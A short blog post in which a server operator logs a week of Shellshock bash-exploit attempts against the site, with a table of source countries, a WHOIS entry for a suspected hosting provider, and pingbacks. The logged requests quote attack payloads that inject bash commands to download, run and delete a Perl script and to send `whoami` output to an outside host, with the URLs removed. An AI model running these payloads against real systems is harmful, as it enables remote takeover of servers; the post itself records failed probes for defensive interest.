One week of bash exploits

Bananas has other methods to prevent spammy clients from doing stuff if the traffic is even genuine to begin with so in the week after the bash exploit (my blog) no damage was down and twelve attempts by four ip addresses that tried it, (my blog) i think i found a crap provider as well.

I have sanitized the urls so if they dont become hrefs.

who/country count what attempted us 4 GET /cgi-bin/helpme HTTP/1.0″ “() { :;}; /bin/bash -c \”cd /tmp;wget http:/ /;curl -O /tmp/jurat http:// ; perl /tmp/jurat*;rm -rf /tmp/jurat\”” id 2 GET /cgi-bin/hi HTTP/1.1″ “() { :;};echo efq2ue25qwneth0s63zh$(curl ‘http://’; wget -qO- ‘http://’;)efq2ue25qwneth0s63zh” us 3 (7 from provider) “GET /cgi-bin/tell HTTP/1.0” “() { :;}; /bin/bash -c \”cd /var/tmp ; rm -rf j* ; wget http:// ; lwp-download http:// ; curl -O /var/tmp/ji http:// ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\”” nl 2


Total 12

“GET / HTTP/1.1” “-” “() { :;}; /bin/bash -c \”curl http://\\&whoami=`whoami`\””

ghettoOur lattest iffy neigbourhod is

NetRange: -
OriginAS:       AS53850
NetName:        GSI-146-71-96-0
NetHandle:      NET-146-71-96-0-1
Parent:         NET-146-0-0-0-0
NetType:        Direct Allocation
Comment:        Abuse:
Comment:        Billing:
Comment:        Technical Support:
RegDate:        2014-06-18
Updated:        2014-06-18

OrgName:        GorillaServers, Inc.
OrgId:          GORIL-3
Address:        800 S Hope St
Address:        Suite B100
City:           Los Angeles
StateProv:      CA
PostalCode:     90017
Country:        US
RegDate:        2011-01-28
Updated:        2012-03-12

Nothing ran but i got a new network block

6 responses

  1. Pingback: late to the party bash probers | Bananas in the Falklands

  2. Pingback: China bashing | Bananas in the Falklands

  3. Pingback: Clueless bashing brits | Bananas in the Falklands

  4. Pingback: America and China bashing in the wild | Bananas in the Falklands

  5. Pingback: Dyke bashing | Bananas in the Falklands

  6. Pingback: Apache 2.4 in the wild | Bananas in the Falklands

by golly but...

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s